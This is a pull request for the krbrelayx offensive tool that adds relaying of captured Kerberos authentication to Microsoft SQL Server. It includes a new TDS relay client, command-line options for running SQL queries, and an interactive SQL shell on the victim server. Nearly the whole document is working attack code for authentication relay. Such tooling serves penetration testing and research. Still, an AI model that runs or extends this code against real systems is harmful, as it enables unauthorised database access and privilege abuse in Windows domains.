### PR TITLE
support for mssql kerberos relay

### DIFF
--- a/krbrelayx.py
+++ b/krbrelayx.py
@@ -78,6 +78,8 @@ def main():
             c.setAttacks(PROTOCOL_ATTACKS)
             c.setLootdir(options.lootdir)
             c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid)
+            c.setMSSQLOptions(options.query)
+            c.setInteractive(options.interactive)
             c.setIPv6(options.ipv6)
             c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
             c.setSMB2Support(not options.no_smb2support)
@@ -120,6 +122,8 @@ def main():
                                                                              'full URL, one per line')
     parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
                                                         'automatically (only valid with -tf)')
+
+    parser.add_argument("-i", "--interactive", action="store_true", help="Launch an smbclient, LDAP console or SQL shell instead")
 
     # Interface address specification
     parser.add_argument('-ip', '--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
@@ -164,6 +168,10 @@ def main():
                         'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
                                                           'directory).')
     smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
+
+    # MSSQL options
+    mssqloptions = parser.add_argument_group("MSSQL attack options")
+    mssqloptions.add_argument("-q", "--query", action="append", required=False, metavar="QUERY", help="MSSQL query to execute (can specify multiple)")
 
     #LDAP options
     ldapoptions = parser.add_argument_group("LDAP attack options")

--- a/lib/clients/mssqlrelayclient.py
+++ b/lib/clients/mssqlrelayclient.py
@@ -1,0 +1,141 @@
+import random
+import string
+import base64
+from struct import unpack
+
+from impacket import LOG
+from impacket.examples.ntlmrelayx.clients import ProtocolClient
+from impacket.tds import (
+    MSSQL,
+    DummyPrint,
+    TDS_ENCRYPT_REQ,
+    TDS_ENCRYPT_OFF,
+    TDS_PRE_LOGIN,
+    TDS_LOGIN,
+    TDS_INIT_LANG_FATAL,
+    TDS_ODBC_ON,
+    TDS_INTEGRATED_SECURITY_ON,
+    TDS_LOGIN7,
+    TDS_SSPI,
+    TDS_LOGINACK_TOKEN,
+)
+
+from impacket.nt_errors import STATUS_SUCCESS, STATUS_ACCESS_DENIED
+from impacket.spnego import SPNEGO_NegTokenResp
+
+try:
+    from OpenSSL import SSL
+except Exception:
+    LOG.critical("pyOpenSSL is not installed, can't continue")
+
+PROTOCOL_CLIENT_CLASS = "MSSQLRelayClient"
+
+
+class MYMSSQL(MSSQL):
+    def __init__(self, address, port=1433, rowsPrinter=DummyPrint()):
+        MSSQL.__init__(self, address, port, rowsPrinter)
+        self.resp = None
+        self.sessionData = {}
+
+    def initConnection(self, authdata, kdc=None):
+        self.connect()
+        # This is copied from tds.py
+        resp = self.preLogin()
+        if (
+            resp["Encryption"] == TDS_ENCRYPT_REQ
+            or resp["Encryption"] == TDS_ENCRYPT_OFF
+        ):
+            LOG.debug("Encryption required, switching to TLS")
+
+            # Switching to TLS now
+            ctx = SSL.Context(SSL.TLS_METHOD)
+            ctx.set_cipher_list("ALL:@SECLEVEL=0".encode("utf-8"))
+            tls = SSL.Connection(ctx, None)
+            tls.set_connect_state()
+
+            while True:
+                try:
+                    tls.do_handshake()
+                except SSL.WantReadError:
+                    data = tls.bio_read(4096)
+                    self.sendTDS(TDS_PRE_LOGIN, data, 0)
+                    tds = self.recvTDS()
+                    tls.bio_write(tds["Data"])
+                else:
+                    break
+
+            # SSL and TLS limitation: Secure Socket Layer (SSL) and its replacement,
+            # Transport Layer Security(TLS), limit data fragments to 16k in size.
+            self.packetSize = 16 * 1024 - 1
+            self.tlsSocket = tls
+
+        self.resp = resp
+        return self.doInitialActions(authdata, kdc)
+
+    def doInitialActions(self, authdata, kdc=None):
+        # Also partly copied from tds.py
+        login = TDS_LOGIN()
+
+        login["HostName"] = (
+            "".join([random.choice(string.ascii_letters) for _ in range(8)])
+        ).encode("utf-16le")
+        login["AppName"] = (
+            "".join([random.choice(string.ascii_letters) for _ in range(8)])
+        ).encode("utf-16le")
+        login["ServerName"] = self.server.encode("utf-16le")
+        login["CltIntName"] = login["AppName"]
+        login["ClientPID"] = random.randint(0, 1024)
+        login["PacketSize"] = self.packetSize
+        login["OptionFlags2"] = (
+            TDS_INIT_LANG_FATAL | TDS_ODBC_ON | TDS_INTEGRATED_SECURITY_ON
+        )
+
+        login["SSPI"] = authdata["krbauth"]
+        login["Length"] = len(login.getData())
+
+        # send the auth
+        self.sendTDS(TDS_LOGIN7, login.getData())
+
+        # According to the specs, if encryption is not required, we must encrypt just
+        # the first Login packet :-o
+        if self.resp["Encryption"] == TDS_ENCRYPT_OFF:
+            self.tlsSocket = None
+
+        tds = self.recvTDS()
+        self.replies = self.parseReply(tds["Data"])
+        return TDS_LOGINACK_TOKEN in self.replies
+
+    def close(self):
+        return self.disconnect()
+
+
+class MSSQLRelayClient(ProtocolClient):
+
+    PLUGIN_NAME = "MSSQL"
+
+    def __init__(
+        self, serverConfig, targetHost, targetPort=1433, extendedSecurity=True
+    ):
+        ProtocolClient.__init__(
+            self, serverConfig, targetHost, targetPort, extendedSecurity
+        )
+
+        self.extendedSecurity = extendedSecurity
+
+        self.domainIp = None
+        self.machineAccount = None
+        self.machineHashes = None
+
+    def initConnection(self, authdata, kdc=None):
+        self.session = MYMSSQL(self.targetHost, self.targetPort)
+        self.session.initConnection(authdata, kdc)
+        return True
+
+    def keepAlive(self):
+        # Don't know yet what needs to be done for TDS
+        pass
+
+    def killConnection(self):
+        if self.session is not None:
+            self.session.disconnect()
+            self.session = None

--- a/lib/utils/config.py
+++ b/lib/utils/config.py
@@ -27,6 +27,10 @@ class KrbRelayxConfig(NTLMRelayxConfig):
         self.addcomputer = False
         self.delegateaccess = False
 
+        # MSSQL options
+        self.queries = []
+        self.interactive = False
+
         # Custom options
         self.victim = None
 
@@ -43,6 +47,12 @@ class KrbRelayxConfig(NTLMRelayxConfig):
         self.dumpgmsa = dumpgmsa
         self.dumpadcs = dumpadcs
         self.sid = sid
+
+    def setMSSQLOptions(self, queries):
+        self.queries = queries
+
+    def setInteractive(self, interactive):
+        self.interactive = interactive
 
     def setAuthOptions(self, aeskey, hashes, dcip, password, salt, israwpassword=False):
         self.dcip = dcip

--- a/requirements.txt
+++ b/requirements.txt
@@ -1,0 +1,1 @@
+impacket


### PR DESCRIPTION
This pull request adds to krbrelayx.py the ability to relay kerberos authentications to MSSQL servers.

One downside of this technique is that the account running the SQL Server must be the machine account. If it isn't the case, the original AP-REQ won't be encrypted with the right key and so the account running the SQL Server won't be able to decrypt it, denying the authentication.